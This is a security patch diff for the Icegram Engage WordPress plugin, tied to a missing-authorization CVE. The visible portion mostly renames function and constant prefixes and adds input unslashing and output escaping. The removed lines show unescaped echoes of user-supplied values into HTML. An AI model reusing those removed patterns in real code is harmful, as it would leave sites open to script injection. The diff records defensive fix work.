CVE-2025-68507: Icegram <= 3.1.35 – Missing Authorization (icegram)

--- a/icegram/icegram.php
+++ b/icegram/icegram.php
@@ -3,8 +3,8 @@
  * Plugin Name: Icegram Engage - Popups, Optins, CTAs & lot more...
  * Plugin URI: https://www.icegram.com/
  * Description: All in one solution to inspire, convert and engage your audiences. Action bars, Popup windows, Messengers, Toast notifications and more. Awesome themes and powerful rules.
- * Version: 3.1.35
- * Tested up to: 6.7.1
+ * Version: 3.1.36
+ * Tested up to: 6.8
  * Author: icegram
  * Author URI: https://www.icegram.com/
  * Copyright (c) 2014-23 Icegram
@@ -12,19 +12,19 @@
  * License URI: http://www.gnu.org/licenses/gpl-3.0.html
  *
  * Text Domain: icegram
- * Domain Path: /lang/
+ * Domain Path: /lite/lang/
 */

 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }

-if ( ! defined( 'IG_FEEDBACK_TRACKER_VERSION' ) ) {
-	define( 'IG_FEEDBACK_TRACKER_VERSION', '1.2.8' );
+if ( ! defined( 'ICEGRAM_FEEDBACK_TRACKER_VERSION' ) ) {
+	define( 'ICEGRAM_FEEDBACK_TRACKER_VERSION', '1.2.9' );
 }

-if ( ! defined( 'IG_USAGE_TRACKER_VERSION' ) ) {
-	define( 'IG_USAGE_TRACKER_VERSION', '1.0.1' );
+if ( ! defined( 'ICEGRAM_USAGE_TRACKER_VERSION' ) ) {
+	define( 'ICEGRAM_USAGE_TRACKER_VERSION', '1.0.2' );
 }

 /* ***************************** Initial Compatibility Work (Start) ******************* */
@@ -32,23 +32,22 @@
 /* =========== Do not edit this code unless you know what you are doing ========= */

 /*
- * Note: We are not using IG_PLUGIN_DIR constant at this moment because there are chances
+ * Note: We are not using ICEGRAM_PLUGIN_DIR constant at this moment because there are chances
  * It might be defined from older version of IG
  */
 require plugin_dir_path( __FILE__ ) . 'lite/classes/feedback/class-ig-tracker.php';

-global $ig_tracker;
+global $icegram_tracker;

-$ig_tracker = 'IG_Tracker_V_' . str_replace( '.', '_', IG_FEEDBACK_TRACKER_VERSION );
+$icegram_tracker = 'IG_Tracker_V_' . str_replace( '.', '_', ICEGRAM_FEEDBACK_TRACKER_VERSION );

-
-if ( ! function_exists( 'ig_show_upgrade_pro_notice' ) ) {
+if ( ! function_exists( 'icegram_show_upgrade_pro_notice' ) ) {
 	/**
 	 * Show IG Premium Upgrade Notice
 	 *
 	 * @since 1.11.0
-	 */
-	function ig_show_upgrade_pro_notice() {
+	 */
+	function icegram_show_upgrade_pro_notice() {
 		$url = admin_url( 'plugins.php?plugin_status=upgrade' );
 		?>
 		<div class="notice notice-error">
@@ -68,14 +67,15 @@
 	require_once ABSPATH . 'wp-admin/includes/plugin.php';
 }

-$ig_plan = 'lite';
+$icegram_plan = 'lite';
 if ( 'icegram-engage.php' === basename( __FILE__ ) ) {
-	$ig_plan = 'premium';
+	$icegram_plan = 'premium';
 }
-$current_active_plugins = $ig_tracker::get_active_plugins();

-if ( 'premium' === $ig_plan ) {
-	if ( in_array( 'icegram/icegram.php', $current_active_plugins, true ) ) {
+$icegram_current_active_plugins = $icegram_tracker::get_active_plugins();
+
+if ( 'premium' === $icegram_plan ) {
+	if ( in_array( 'icegram/icegram.php', $icegram_current_active_plugins, true ) ) {
 		deactivate_plugins( 'icegram/icegram.php', true );
 	}
 } else {
@@ -86,26 +86,27 @@
 	 * - If It's installed & It's >= 2.0.0 => return
 	 */

-	//- If It's installed & It's < 2.0.0 => Show Upgrade Notice
-	$all_plugins = $ig_tracker::get_plugins( 'all', true );
-
-	$ig_prem_plugin         = 'icegram-engage/icegram-engage.php';
-	$ig_prem_plugin_version = ! empty( $all_plugins[ $ig_prem_plugin ] ) ? $all_plugins[ $ig_prem_plugin ]['version'] : '';
+	//- If It's installed & It's < 2.0.0 => Show Upgrade Notice
+	$icegram_all_plugins = $icegram_tracker::get_plugins( 'all', true );
+
+	$icegram_prem_plugin         = 'icegram-engage/icegram-engage.php';
+
+	$icegram_prem_plugin_version = ! empty( $icegram_all_plugins[ $icegram_prem_plugin ] ) ? $icegram_all_plugins[ $icegram_prem_plugin ]['version'] : '';

-	if ( ! empty( $ig_prem_plugin_version ) ) {
+	if ( ! empty( $icegram_prem_plugin_version ) ) {

 		// Is Premium active?
-		$is_premium_active = $all_plugins[ $ig_prem_plugin ]['is_active'];
+		$icegram_is_premium_active = $icegram_all_plugins[ $icegram_prem_plugin ]['is_active'];

 		// Free >= 2.0.0 && Premium < 2.0.0
-		if ( version_compare( $ig_prem_plugin_version, '2.0.0', '<' ) ) {
+		if ( version_compare( $icegram_prem_plugin_version, '2.0.0', '<' ) ) {

 			// Show Upgrade Notice if It's Admin Screen.
 			if ( is_admin() ) {
-				add_action( 'admin_head', 'ig_show_upgrade_pro_notice', PHP_INT_MAX );
+				add_action( 'admin_head', 'icegram_show_upgrade_pro_notice', PHP_INT_MAX );
 			}

-		} elseif ( $is_premium_active && version_compare( $ig_prem_plugin_version, '2.0.0', '>=' ) ) {
+		} elseif ( $icegram_is_premium_active && version_compare( $icegram_prem_plugin_version, '2.0.0', '>=' ) ) {
 			return;
 		}
 	}
@@ -113,37 +114,37 @@

 /* ***************************** Initial Compatibility Work (End) ******************* */

-if ( ! defined( 'IG_PLUGIN_DIR' ) ) {
-	define( 'IG_PLUGIN_DIR', plugin_dir_path( __FILE__ ) );
+if ( ! defined( 'ICEGRAM_PLUGIN_DIR' ) ) {
+	define( 'ICEGRAM_PLUGIN_DIR', plugin_dir_path( __FILE__ ) );
 }

-if ( ! defined( 'IG_PLUGIN_URL' ) ) {
-	define( 'IG_PLUGIN_URL', plugin_dir_url( __FILE__ ) );
+if ( ! defined( 'ICEGRAM_PLUGIN_URL' ) ) {
+	define( 'ICEGRAM_PLUGIN_URL', plugin_dir_url( __FILE__ ) );
 }

-if ( ! defined( 'IG_PLUGIN_FILE' ) ) {
-	define( 'IG_PLUGIN_FILE', __FILE__ );
+if ( ! defined( 'ICEGRAM_PLUGIN_FILE' ) ) {
+	define( 'ICEGRAM_PLUGIN_FILE', __FILE__ );
 }

-if ( ! defined( 'IG_PLUGIN_VERSION' ) ) {
-  	define( 'IG_PLUGIN_VERSION', '3.1.35' );
+if ( ! defined( 'ICEGRAM_PLUGIN_VERSION' ) ) {
+  	define( 'ICEGRAM_PLUGIN_VERSION', '3.1.36' );
 }

-if ( ! defined( 'IG_PRODUCT_ID' ) ) {
-	define( 'IG_PRODUCT_ID', 1000 );
+if ( ! defined( 'ICEGRAM_PRODUCT_ID' ) ) {
+	define( 'ICEGRAM_PRODUCT_ID', 1000 );
 }

 require plugin_dir_path( __FILE__ ) . 'lite/class-icegram.php';
 require plugin_dir_path( __FILE__ ) . 'lite/class-icegram-loader.php';


-if ( ! function_exists( 'activate_icegram' ) ) {
+if ( ! function_exists( 'icegram_activate' ) ) {
 	/**
 	 * The code that runs during plugin activation.
 	 *
 	 * @param bool $network_wide Is plugin being activated on a network.
-	 */
-	function activate_icegram( $network_wide ) {
+	 */
+	function icegram_activate( $network_wide ) {

 		global $wpdb;
 		require_once plugin_dir_path( __FILE__ ) . 'lite/classes/class-icegram-activator.php';
@@ -151,9 +152,10 @@
 		if ( is_multisite() && $network_wide ) {

 			// Get all active blogs in the network and activate plugin on each one
+			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 			$blog_ids = $wpdb->get_col( $wpdb->prepare( "SELECT blog_id FROM $wpdb->blogs WHERE deleted = %d", 0 ) );
 			foreach ( $blog_ids as $blog_id ) {
-				ig_activate_on_blog( $blog_id );
+				icegram_activate_on_blog( $blog_id );
 			}
 		} else {
 			Icegram_Activator::activate();
@@ -161,14 +163,14 @@
 	}
 }

-if ( ! function_exists( 'deactivate_icegram' ) ) {
+if ( ! function_exists( 'icegram_deactivate' ) ) {
 	/**
 	 * The code that runs during plugin deactivation.
 	 *
 	 * @param bool $network_wide Is plugin being activated on a network.
 	 *
-	 */
-	function deactivate_icegram( $network_wide ) {
+	 */
+	function icegram_deactivate( $network_wide ) {

 		require_once plugin_dir_path( __FILE__ ) . 'lite/classes/class-icegram-deactivator.php';

@@ -177,10 +179,11 @@
 			global $wpdb;

 			// Get all active blogs in the network.
+			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 			$blog_ids = $wpdb->get_col( $wpdb->prepare( "SELECT blog_id FROM $wpdb->blogs WHERE deleted = %d", 0 ) );
 			foreach ( $blog_ids as $blog_id ) {
 				// Run deactivation code on each one
-				ig_trigger_deactivation_in_multisite( $blog_id );
+				icegram_trigger_deactivation_in_multisite( $blog_id );
 			}
 		} else {
 			Icegram_Deactivator::deactivate();
@@ -188,7 +191,7 @@
 	}
 }

-if ( ! function_exists( 'ig_activate_on_blog' ) ) {
+if ( ! function_exists( 'icegram_activate_on_blog' ) ) {

 	/**
 	 * Function to trigger Icegram's activation code for individual site/blog in a network.
@@ -196,15 +199,15 @@
 	 * @param  int $blog_id Blog ID of newly created site/blog.
 	 *
 	 * @since  1.11.0
-	 */
-	function ig_activate_on_blog( $blog_id ) {
+	 */
+	function icegram_activate_on_blog( $blog_id ) {
 		switch_to_blog( $blog_id );
 		Icegram_Activator::activate();
 		restore_current_blog();
 	}
 }

-if ( ! function_exists( 'ig_trigger_deactivation_in_multisite' ) ) {
+if ( ! function_exists( 'icegram_trigger_deactivation_in_multisite' ) ) {

 	/**
 	 * Function to trigger Icegram deactivation code for individual site in a network.
@@ -213,26 +216,26 @@
 	 *
 	 * @since  1.11.0
 	 */
-	function ig_trigger_deactivation_in_multisite( $blog_id ) {
+	function icegram_trigger_deactivation_in_multisite( $blog_id ) {
 		switch_to_blog( $blog_id );
 		Icegram_Deactivator::deactivate();
 		restore_current_blog();
 	}
 }

-register_activation_hook( __FILE__, 'activate_icegram' );
-register_deactivation_hook( __FILE__, 'deactivate_icegram' );
+register_activation_hook( __FILE__, 'icegram_activate' );
+register_deactivation_hook( __FILE__, 'icegram_deactivate' );

-add_action( 'init', 'load_icegram_translations' );
-if ( ! function_exists( 'load_icegram_translations' ) ) {
-	function load_icegram_translations() {
-		load_plugin_textdomain( 'icegram', false, IG_PLUGIN_DIR . 'lite/lang/' );
+add_action( 'init', 'icegram_load_translations' );
+if ( ! function_exists( 'icegram_load_translations' ) ) {
+	function icegram_load_translations() {
+		load_plugin_textdomain( 'icegram', false, ICEGRAM_PLUGIN_DIR . 'lite/lang/' );
 	}
 }

-add_action( 'plugins_loaded', 'initialize_icegram' );
-if ( ! function_exists( 'initialize_icegram' ) ) {
-    function initialize_icegram() {
+add_action( 'plugins_loaded', 'icegram_initialize' );
+if ( ! function_exists( 'icegram_initialize' ) ) {
+    function icegram_initialize() {
         /* @var Icegram Object */
         global $icegram;
         $icegram = new Icegram();
@@ -240,10 +243,11 @@
     }
 }

-add_filter( 'ig-engage_is_page_for_notifications', 'ig_show_notification');
+add_filter( 'icegram-engage_is_page_for_notifications', 'icegram_show_notification');

-if ( ! function_exists( 'ig_show_notification' ) ) {
-	function ig_show_notification(){
+if ( ! function_exists( 'icegram_show_notification' ) ) {
+
+	function icegram_show_notification(){

 		$screen = get_current_screen();

@@ -259,7 +263,7 @@
 	}
 }

-if ( ! function_exists( 'IG' ) ) {
+if ( ! function_exists( 'Icegram_Instance' ) ) {

 	/**
 	 * Icegram instance
@@ -269,8 +273,8 @@
 	 * @return Icegram
 	 *
 	 * @since 1.11.0
-	 */
-	function IG( $plugin_path = '' ) {
+	 */
+	function Icegram_Instance( $plugin_path = '' ) {
 		$icegram_loader = Icegram_Loader::instance();
 		// Load files if plugin path given.
 		if ( ! empty( $plugin_path ) ) {
@@ -280,11 +284,12 @@
 	}
 }

-$current_plugin_path = plugin_dir_path( __FILE__ );
+
+$icegram_current_plugin_path = plugin_dir_path( __FILE__ );

 /**
  * We need to pass the plugin path explicitly using $current_plugin_path variable.
- * We are not using IG_PLUGIN_DIR constant here, since using IG_PLUGIN_DIR constant causes premium version files not getting loaded when lite version is active and user is activating premium versions.
- * In that case, value of IG_PLUGIN_DIR constant is the path of Icegram lite plugin(since it is loaded first before premium version) which does not have premium version's file thus these files are not loaded.
+ * We are not using ICEGRAM_PLUGIN_DIR constant here, since using ICEGRAM_PLUGIN_DIR constant causes premium version files not getting loaded when lite version is active and user is activating premium versions.
+ * In that case, value of ICEGRAM_PLUGIN_DIR constant is the path of Icegram lite plugin(since it is loaded first before premium version) which does not have premium version's file thus these files are not loaded.
  */
-IG( $current_plugin_path );
 No newline at end of file
+Icegram_Instance( $icegram_current_plugin_path );
 No newline at end of file
--- a/icegram/lite/about-icegram.php
+++ b/icegram/lite/about-icegram.php
@@ -17,21 +17,23 @@

     if( isset( $_POST['submit_query'] ) && $_POST['submit_query'] == "Send" && !empty($_POST['client_email'])){
         check_admin_referer( 'icegram-submit-query' );
-        $additional_info = ( isset( $_POST['additional_information'] ) && !empty( $_POST['additional_information'] ) ) ? sanitize_text_field( $_POST['additional_information'] ) : '';
+        $additional_info = ( isset( $_POST['additional_information'] ) && ! empty( $_POST['additional_information'] ) ) ? sanitize_text_field( wp_unslash( $_POST['additional_information'] ) ) : '';
         $additional_info = str_replace( '###', '<br />', $additional_info );
         $additional_info = str_replace( array( '[', ']' ), '', $additional_info );

         $from = 'From: ';
-        $from .= ( isset( $_POST['client_name'] ) && !empty( $_POST['client_name'] ) ) ? sanitize_text_field( $_POST['client_name'] ) : '';
-        $from .= ' <' . sanitize_email( $_POST['client_email'] ) . '>' . "rn";
+        $from .= ( isset( $_POST['client_name'] ) && ! empty( $_POST['client_name'] ) ) ? sanitize_text_field( wp_unslash( $_POST['client_name'] ) ) : '';
+        $from .= isset( $_POST['client_email'] ) ? ' <' . sanitize_email( wp_unslash( $_POST['client_email'] ) ) . '>' . "rn" : '';
         $headers .= $from;
         $headers .= str_replace('From: ', 'Reply-To: ', $from);
         $headers .= 'MIME-Version: 1.0' . "rn";
         $headers .= 'Content-type: text/html; charset=UTF-8' . "rn";

-        $message = isset( $_POST['message'] ) ? $additional_info . '<br /><br />'.nl2br(sanitize_text_field($_POST['message'])) : '';
-        $subject = isset( $_POST['subject'] ) ? sanitize_text_field($_POST['subject']) : '';
-        $http_referer = isset( $_SERVER['HTTP_REFERER'] ) ? sanitize_text_field( $_SERVER['HTTP_REFERER'] ) : '';
+        $message = isset( $_POST['message'] ) ? $additional_info . '<br /><br />'.nl2br(sanitize_text_field(wp_unslash( $_POST['message'] ) )) : '';
+        $subject = isset( $_POST['subject'] ) ? sanitize_text_field(wp_unslash( $_POST['subject'] )) : '';
+
+        $http_referer = wp_get_referer();
+
         wp_mail( 'hello@icegram.com', $subject, $message, $headers );
         header('Location: ' . $http_referer );

@@ -130,20 +132,20 @@
             </script>
             <table id="icegram_post_query_table">
                 <tr>
-                    <td><label for="client_name"><?php _e('Name', 'icegram'); ?>*</label></td>
-                    <td><input type="text" class="regular-text sm_text_field" id="client_name" name="client_name" value="<?php echo $customer_name; ?>" /></td>
+                    <td><label for="client_name"><?php esc_html_e('Name', 'icegram'); ?>*</label></td>
+                    <td><input type="text" class="regular-text sm_text_field" id="client_name" name="client_name" value="<?php echo esc_attr($customer_name); ?>" /></td>
                 </tr>
                 <tr>
-                    <td><label for="client_email"><?php _e('E-mail', 'icegram'); ?>*</label></td>
-                    <td><input type="email" class="regular-text sm_text_field" id="client_email" name="client_email" value="<?php echo $customer_email; ?>" /></td>
+                    <td><label for="client_email"><?php esc_html_e('E-mail', 'icegram'); ?>*</label></td>
+                    <td><input type="email" class="regular-text sm_text_field" id="client_email" name="client_email" value="<?php echo esc_attr($customer_email); ?>" /></td>
                 </tr>
                 <tr>
-                    <td><label for="subject"><?php _e('Subject', 'icegram'); ?>*</label></td>
-                    <td><input type="text" class="regular-text sm_text_field" id="subject" name="subject" value="<?php echo ( !empty( $subject ) ) ? $subject : ''; ?>" /></td>
+                    <td><label for="subject"><?php esc_html_e('Subject', 'icegram'); ?>*</label></td>
+                    <td><input type="text" class="regular-text sm_text_field" id="subject" name="subject" value="<?php echo esc_attr( !empty( $subject ) ? $subject : ''); ?>" /></td>
                 </tr>
                 <tr>
-                    <td style="vertical-align: top; padding-top: 12px;"><label for="message"><?php _e('Message', 'icegram'); ?>*</label></td>
-                    <td><textarea id="message" name="message" rows="10" cols="60"><?php echo ( !empty( $message ) ) ? $message : ''; ?></textarea></td>
+                    <td style="vertical-align: top; padding-top: 12px;"><label for="message"><?php esc_html_e('Message', 'icegram'); ?>*</label></td>
+                    <td><textarea id="message" name="message" rows="10" cols="60"><?php echo esc_attr( !empty( $message ) ? $message : ''); ?></textarea></td>
                 </tr>
                 <tr>
                     <td></td>
@@ -155,7 +157,7 @@
                 </tr>
             </table>
             <?php wp_nonce_field( 'icegram-submit-query'); ?>
-            <input type="hidden" id="current_plugin" name="additional_info[current_plugin]" value="Icegram <?php echo $icegram->version; ?>" />
+            <input type="hidden" id="current_plugin" name="additional_info[current_plugin]" value="Icegram <?php echo esc_attr($icegram->version); ?>" />
         </form>
     </div>
     <?php
@@ -168,30 +170,45 @@
     add_thickbox();
 }

+
+function icegram_get_about_page_vars() {
+    global $icegram;
+
+    $ig_sample_id = get_option('icegram_sample_data_imported');
+
+    return array(
+        'sample_id'     => $ig_sample_id,
+        'view_campaign' => admin_url( 'post.php?post=' . $ig_sample_id[0] . '&action=edit' ),
+        'preview_url'   => home_url( '?campaign_preview_id=' . $ig_sample_id[0] ),
+        'assets_base'   => $icegram->plugin_url . '/assets/images/',
+        'version'       => $icegram->version,
+    );
+}
+
+
+$icegram_about_vars = icegram_get_about_page_vars();
+
 ?>
         <div class="wrap about-wrap icegram">
             <div class="about-header">
                 <div class="about-text icegram-about-text">
-                <strong><?php _e( "Welcome to Icegram Engage.", "icegram" ); ?></strong>
-                    <?php _e( " Your sample campaign is ready!", "icegram" )?>
-                    <?php
-                        $sample_id = get_option('icegram_sample_data_imported');
-                        $view_campaign = admin_url( 'post.php?post='.$sample_id[0].'&action=edit' );
-                        $preview_url = home_url('?campaign_preview_id='.$sample_id[0]);
-                        $assets_base = $this->plugin_url . '/assets/images/';
-                    ?>
+                <strong><?php esc_html_e( "Welcome to Icegram Engage.", "icegram" ); ?></strong>
+                    <?php esc_html_e( "Your sample campaign is ready!", "icegram" )?>
                     <p class="icegram-actions">
-                        <a class="button button-primary button-large" href="<?php echo $preview_url; ?>" target="_blank" ><?php _e( 'Preview Your First Campaign', 'icegram' ); ?></a>
-                        <span style="margin: 0 .5em"><?php _e( "OR", "icegram")?></span>
-                        <a href="<?php echo $view_campaign ; ?>"> <strong><?php _e( 'Edit & Publish it.', 'icegram' ); ?></strong></a>
+                        <a class="button button-primary button-large" href="<?php echo esc_url( $icegram_about_vars['preview_url'] ); ?>" target="_blank" ><?php esc_html_e( 'Preview Your First Campaign', 'icegram' ); ?></a>
+                        <span style="margin: 0 .5em"><?php esc_html_e( "OR", "icegram")?></span>
+                        <a href="<?php echo esc_url( $icegram_about_vars['view_campaign'] ); ?>"> <strong><?php esc_html_e( 'Edit & Publish it.', 'icegram' ); ?></strong></a>
                     </p>
                 </div>
                 <div class="icegram-badge">
-                   <?php printf(__( "Version: %s", "icegram"), $this->version ); ?>
+                   <?php
+                    /* translators: %s is the plugin version */
+                    echo esc_html( sprintf( __( 'Version: %s', 'icegram' ), $icegram_about_vars['version'] ) );
+                    ?>
                 </div>
                 <div class="icegram-support">
-                    <?php _e( 'Questions? Need Help?', "icegram" ); ?>
-                    <div id="icegram-contact-us" class="icegram-contact-us"><a class="thickbox"  href="<?php echo admin_url() . "#TB_inline?inlineId=icegram_post_query_form&post_type=ig_campaign" ?>"><?php _e("Contact Us", "icegram"); ?></a></div>
+                    <?php esc_html_e( 'Questions? Need Help?', "icegram" ); ?>
+                    <div id="icegram-contact-us" class="icegram-contact-us"><a class="thickbox"  href="<?php echo esc_url( admin_url() . '#TB_inline?inlineId=icegram_post_query_form&post_type=ig_campaign' ); ?>"><?php esc_html_e("Contact Us", "icegram"); ?></a></div>
                 </div>
                 <?php do_action('icegram_about_changelog'); ?>
              </div>
@@ -199,35 +216,35 @@
             <div class="changelog">
                 <!-- <hr> -->
                 <div class="about-text">
-                <?php _e("Do read Icegram Engage's core concepts below to understand how you can use Icegram Engage to ", "icegram"); ?>
-                <strong><?php _e("inspire, convert and engage", "icegram"); ?></strong>
-                <?php _e("your audience.", "icegram"); ?>
+                <?php esc_html_e("Do read Icegram Engage's core concepts below to understand how you can use Icegram Engage to ", "icegram"); ?>
+                <strong><?php esc_html_e("inspire, convert and engage", "icegram"); ?></strong>
+                <?php esc_html_e("your audience.", "icegram"); ?>
                 </div>

                 <div class="feature-section col three-col">
-                    <h2 class="icegram-dashicons dashicons-testimonial"><?php _e( "Messages", "icegram" ); ?></h2>
+                    <h2 class="icegram-dashicons dashicons-testimonial"><?php esc_html_e( "Messages", "icegram" ); ?></h2>
                     <div class="col-1">
-                        <p><?php _e("A 'Message' is a communication you want to deliver to your audience.","icegram"); ?></p>
-                        <p><?php _e("And Icegram Engage comes with not one, but four message types.","icegram"); ?></p>
-                        <p><?php _e("Different message types look and behave differently, but they all have many common characteristics. For instance, most message types will allow you to set a headline, a body text, label for the ‘call to action’ button, a link for that button, theme and styling options, animation effect and position on screen where that message should show.","icegram"); ?></p>
+                        <p><?php esc_html_e("A 'Message' is a communication you want to deliver to your audience.","icegram"); ?></p>
+                        <p><?php esc_html_e("And Icegram Engage comes with not one, but four message types.","icegram"); ?></p>
+                        <p><?php esc_html_e("Different message types look and behave differently, but they all have many common characteristics. For instance, most message types will allow you to set a headline, a body text, label for the ‘call to action’ button, a link for that button, theme and styling options, animation effect and position on screen where that message should show.","icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_message_types_col1'); ?>
                     </div>
                     <div class="col-2">
-                        <h4><?php _e("Action Bar", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-action-bar.png" width="180" height="145">
-                        <p><?php _e("An action bar is a proven attention grabber. It shows up as a solid bar either at top or bottom. Use it for your most important messages or time sensitive announcements. Put longer content in it and it acts like a collapsible panel!", "icegram"); ?></p>
-                        <h4><?php _e("Messenger", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-messenger.png" width="180" height="145">
-                        <p><?php _e("A messenger is best used to invoke interest while your visitor is reading your content. Users perceive it as something new, important and urgent and are highly likely to click on it.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Action Bar", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-action-bar.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("An action bar is a proven attention grabber. It shows up as a solid bar either at top or bottom. Use it for your most important messages or time sensitive announcements. Put longer content in it and it acts like a collapsible panel!", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Messenger", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-messenger.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("A messenger is best used to invoke interest while your visitor is reading your content. Users perceive it as something new, important and urgent and are highly likely to click on it.", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_message_types_col2'); ?>
                     </div>
                     <div class="col-3 last-feature">
-                        <h4><?php _e("Toast Notification", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-toast-notification.png" width="180" height="145">
-                        <p><?php _e("Want to alert your visitor about some news, an update from your blog, a social proof or an offer? Use Icegram Engage’s unique toast notification, it will catch their attention, let them click on the message, and disappear after a while.", "icegram"); ?></p>
-                        <h4><?php _e("Popup", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-popup.png" width="180" height="145">
-                        <p><?php _e("Lightbox popup windows are most widely used for lead capture, promotions and additional content display. Ask visitors to sign up to your newsletter, or like you on social networks, or tell them about a special offer...", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Toast Notification", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-toast-notification.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("Want to alert your visitor about some news, an update from your blog, a social proof or an offer? Use Icegram Engage’s unique toast notification, it will catch their attention, let them click on the message, and disappear after a while.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Popup", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-popup.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("Lightbox popup windows are most widely used for lead capture, promotions and additional content display. Ask visitors to sign up to your newsletter, or like you on social networks, or tell them about a special offer...", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_message_types_col3'); ?>
                     </div>
                 </div>
@@ -236,23 +253,23 @@
                 <?php do_action('icegram_about_after_core_message_types'); ?>

                 <div class="feature-section col three-col">
-                    <h2 class="icegram-dashicons dashicons-megaphone"><?php _e("Campaigns", "icegram"); ?></h2>
+                    <h2 class="icegram-dashicons dashicons-megaphone"><?php esc_html_e("Campaigns", "icegram"); ?></h2>
                     <div class="col-1">
-                        <p><strong><?php _e("Campaign = Messages + Rules", "icegram"); ?></strong></p>
-                        <p><?php _e("A campaign allows sequencing multiple messages and defining targeting rules. Create different campaigns for different marketing goals. Icegram Engage supports showing multiple campaigns on any page.", "icegram"); ?></p>
-						<p><?php _e("You can always preview your campaign to ensure campaign works the way you want, before making it live.", "icegram"); ?></p>
+                        <p><strong><?php esc_html_e("Campaign = Messages + Rules", "icegram"); ?></strong></p>
+                        <p><?php esc_html_e("A campaign allows sequencing multiple messages and defining targeting rules. Create different campaigns for different marketing goals. Icegram Engage supports showing multiple campaigns on any page.", "icegram"); ?></p>
+						<p><?php esc_html_e("You can always preview your campaign to ensure campaign works the way you want, before making it live.", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_campaigns_col1'); ?>
                     </div>
                     <div class="col-2">
-                        <h4><?php _e("Multiple Messages & Sequencing", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-multiple-sequence.png" width="180" height="145">
-                        <p><?php _e("Add one or as many messages to a campaign as you want. Also choose the number of seconds after which each message should show up. Showing multiple messages for same goal, but with slightly different content / presentation, greatly improves conversions.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Multiple Messages & Sequencing", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-multiple-sequence.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("Add one or as many messages to a campaign as you want. Also choose the number of seconds after which each message should show up. Showing multiple messages for same goal, but with slightly different content / presentation, greatly improves conversions.", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_campaigns_col2'); ?>
                     </div>
                     <div class="col-3 last-feature">
-                        <h4><?php _e("Targeting Rules", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-rules.png" width="180" height="145">
-                        <p><?php _e("You can control who sees a campaign – and on what device, which pages does it show on, and what time period will it stay active for. You can run different campaigns with different rules to maximize engagement.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Targeting Rules", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-rules.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("You can control who sees a campaign – and on what device, which pages does it show on, and what time period will it stay active for. You can run different campaigns with different rules to maximize engagement.", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_campaigns_col3'); ?>
                     </div>
                 </div>
@@ -261,44 +278,44 @@

                 <hr>
                 <div class="feature-section col two-col">
-                    <h2 class="icegram-dashicons dashicons-editor-help"><?php _e("FAQ / Common Problems", "icegram"); ?></h2>
+                    <h2 class="icegram-dashicons dashicons-editor-help"><?php esc_html_e("FAQ / Common Problems", "icegram"); ?></h2>
                     <div class="col-1">

-                        <h4><?php _e("Messages look broken / formatting is weird...", "icegram"); ?></h4>
-                        <p><?php _e("This is most likely due to CSS conflicts with current theme. We suggest using simple formatting for messages. You can also write custom CSS in your theme to fix any problems.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Messages look broken / formatting is weird...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("This is most likely due to CSS conflicts with current theme. We suggest using simple formatting for messages. You can also write custom CSS in your theme to fix any problems.", "icegram"); ?></p>

-                        <h4><?php _e("Extra Line Breaks / Paragraphs in messages...", "icegram"); ?></h4>
-                        <p><?php _e("Go to HTML mode in content editor and pull your custom HTML code all together in one line. Don't leave blank lines between two tags. That should fix it.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Extra Line Breaks / Paragraphs in messages...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Go to HTML mode in content editor and pull your custom HTML code all together in one line. Don't leave blank lines between two tags. That should fix it.", "icegram"); ?></p>

-                        <h4><?php _e("How do I add custom CSS for messages?", "icegram"); ?></h4>
-                        <p><?php _e("You can use custom CSS/JS inline in your message HTML. You can also use your theme's custom JS / CSS feature to add your changes.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("How do I add custom CSS for messages?", "icegram"); ?></h4>
+                        <p><?php esc_html_e("You can use custom CSS/JS inline in your message HTML. You can also use your theme's custom JS / CSS feature to add your changes.", "icegram"); ?></p>

-                        <h4><?php _e("Optin Forms / Mailing service integration...", "icegram"); ?></h4>
-                        <p><?php _e("You can embed any optin / subscription form to your Icegram Engage messages using 'Embed Form' button above text editor. Paste in form HTML code and let Icegram Engage clean it up! You may even use a shortcode if you are using a WP plugin from your newsletter / lead capture service.", "icegram"); ?></p>
